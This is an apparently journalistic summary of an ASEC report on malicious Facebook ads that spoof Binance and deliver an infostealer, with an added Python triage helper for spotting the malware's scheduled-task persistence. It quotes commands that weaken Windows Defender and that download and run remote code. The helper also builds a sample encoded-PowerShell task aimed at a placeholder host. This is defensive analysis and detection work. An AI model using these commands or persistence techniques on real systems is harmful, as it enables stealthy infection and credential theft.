Fake advertisements | Image: ASEC
AhnLab Security Intelligence Center (ASEC) has uncovered a multi-stage malware campaign that targets cryptocurrency users through malicious Facebook ads. The campaign uses fake Binance-branded websites to deliver an infostealer capable of system reconnaissance, screen capture, credential theft, and PowerShell-based persistence.
At the heart of the campaign is social engineering via advertising. Threat actors buy Facebook ads that mimic popular cryptocurrency platforms such as Binance. When a user clicks “Learn More” or “Download,” they are redirected to a spoofed website, but only if ad-tracking parameters such as utm_campaign, cid, or fbclid are present in the URL. The malicious redirect is therefore served only to visitors who arrived by clicking the ad; anyone who opens the link without those parameters, for instance an analyst revisiting a stripped URL, does not see it.
Once the user lands on the malicious site, they’re prompted to download a Windows installer.
“When the user clicks the button, a file named ‘installer.msi’ is downloaded… a specific port (30303) on the local host is opened… and begins to communicate with the system through this port.”
Upon installation of installer.msi, the malware opens a listener on local port 30303 and communicates through it with a JavaScript component embedded in the spoofed website. Depending on the commands sent by the server, the malware performs a sequence of actions keyed on the request parameter:

| Parameter | Function |
|---|---|
| /file | Downloads the MSI installer |
| /r | Queries the GUID from the registry |
| /w | Retrieves system information using WMI |
| /worker | Sends scheduler instructions in XML |
If the malware detects a virtual environment, it halts execution. If not, it proceeds with downloading and executing a PowerShell-based task scheduler, laying the groundwork for persistent infection.
“When a scheduler is registered, events in the ‘Application’ log trigger the execution of a PowerShell script encoded in BASE64.”
The malware secures its persistence and lowers its chance of detection by weakening Windows Defender. The PowerShell scripts run commands such as:

1. Exclude the running PowerShell process from Defender scans:
```powershell
Add-MpPreference -ExclusionProcess (Get-Process -PID $PID).MainModule.ModuleName
```
2. Exclude the working directory from scans:
```powershell
Add-MpPreference -ExclusionPath (Get-Location)
```
3–4. Download and execute further scripts:
```powershell
Invoke-WebRequest -UseBasicParsing <malicious_domain> | Invoke-Expression
```

Both Add-MpPreference calls require an elevated session, and Defender records each configuration change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, so unexpected process or path exclusions are a reliable thing to alert on. This staged download mechanism lets the operators update or extend the malware's functionality on the fly without touching the initial installer.
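The persistence step (a scheduled task triggered by Application-log events that runs Base64-encoded PowerShell) and the Defender-exclusion and download-and-execute commands above are what a responder would want to pull out of a suspect host. The triage helper below is an added example, not ASEC's tooling or the malware's own code: it parses a Task Scheduler XML definition, reports which event-log channels its EventTrigger subscribes to, decodes the -EncodedCommand payload (Base64 of UTF-16LE text, which is why a plain Base64 decode shows NUL bytes between characters), and scans the decoded script for the patterns quoted in the article. The task XML, its EventID filter, and the stage.invalid staging domain are constructed for this example and are not indicators from the report.

```python
"""Triage helper for the persistence chain described above.

Added example, not ASEC's tooling or the malware's own code. The task XML,
the event filter and the staging domain below are constructed for
illustration only.
"""
import base64
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Namespace used by Task Scheduler XML exports (schtasks /query /xml).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Behaviours worth alerting on in decoded PowerShell (case-insensitive).
SUSPICIOUS = {
    "defender_process_exclusion": re.compile(r"Add-MpPreference\s[^\n|]*-ExclusionProcess", re.I),
    "defender_path_exclusion": re.compile(r"Add-MpPreference\s[^\n|]*-ExclusionPath", re.I),
    # Download cradle: a web request piped straight into Invoke-Expression (iex).
    "download_cradle": re.compile(r"(Invoke-WebRequest|\biwr\b)[^\n|]*\|\s*(Invoke-Expression|\biex\b)", re.I),
}


def encode_command(script: str) -> str:
    """Produce what 'powershell -EncodedCommand' expects: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(args: str) -> Optional[str]:
    """Return the script behind -EncodedCommand/-enc/-ec/-e, or None if absent or malformed."""
    m = re.search(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", args, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_script(script: str) -> list:
    """Names of the SUSPICIOUS patterns present in a PowerShell script."""
    return [name for name, rx in SUSPICIOUS.items() if rx.search(script)]


def triage_command_line(cmdline: str) -> list:
    """Scan a process command line, transparently decoding an encoded payload."""
    return scan_script(decode_encoded_command(cmdline) or cmdline)


def event_log_channels(subscription: str) -> list:
    """Event-log channels named in an EventTrigger subscription query."""
    return sorted(set(re.findall(r'Path="([^"]+)"', subscription)))


def triage_task_xml(xml_text: str) -> dict:
    """Summarise event triggers, actions and indicators in one task definition."""
    root = ET.fromstring(xml_text)
    report = {"event_triggers": [], "actions": [], "indicators": []}
    for trig in root.findall(".//t:EventTrigger", TASK_NS):
        sub = trig.findtext("t:Subscription", default="", namespaces=TASK_NS)
        report["event_triggers"].append(event_log_channels(sub))
    for act in root.findall(".//t:Exec", TASK_NS):
        cmd = act.findtext("t:Command", default="", namespaces=TASK_NS)
        args = act.findtext("t:Arguments", default="", namespaces=TASK_NS)
        decoded = decode_encoded_command(args)
        report["actions"].append({"command": cmd, "decoded": decoded})
        if decoded:
            report["indicators"].extend(scan_script(decoded))
    return report


# Constructed payload mirroring the commands quoted in the article;
# stage.invalid is a placeholder domain, not an indicator from the report.
SCRIPT = (
    "Add-MpPreference -ExclusionProcess (Get-Process -PID $PID).MainModule.ModuleName\n"
    "Add-MpPreference -ExclusionPath (Get-Location)\n"
    "Invoke-WebRequest -UseBasicParsing http://stage.invalid/next.ps1 | Invoke-Expression\n"
)

# Constructed task definition: fires on Application-log events and runs the
# encoded script. The EventID filter is illustrative only.
SAMPLE_TASK_XML = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=1000]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
    </EventTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand {encode_command(SCRIPT)}</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    result = triage_task_xml(SAMPLE_TASK_XML)
    print("event-log triggers:", result["event_triggers"])
    print("indicators:", result["indicators"])
    print(result["actions"][0]["decoded"])
```

On a live host the same functions apply to output of `schtasks /query /xml` and to process command lines from Sysmon or EDR telemetry; a task whose trigger is an event-log subscription and whose action is an encoded PowerShell command is unusual enough on its own to merit a look, before any pattern in the decoded script is considered.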
“The downloaded script then downloads and executes additional scripts from an external source,” the report confirms, exposing a well-architected, modular attack chain.
The final payload is an infostealer. It exfiltrates:
- System details: OS version, memory, CPU, and disk information
- Browser data: saved credentials and cookies from Chrome and Firefox
- Telegram data
- Files: .docx, .pdf, .rdp, .ovpn, and more
- Keystrokes: logs user activity via a keylogger module
The goal is to harvest as much sensitive information as possible, enabling potential account takeover, identity theft, and espionage.
Users are urged to exercise extreme caution with downloads originating from ads:
“Users are advised to check the domain of the website when downloading files to ensure that it is the official website.”
ASEC emphasizes that many ad-based downloads are potentially unwanted programs (PUPs) or outright malware. To mitigate risk:
- Avoid downloading software promoted through social media ads.
- Always verify the domain against official sources.
- Keep antivirus and OS fully updated.
- Monitor system processes and scheduled tasks for anomalies.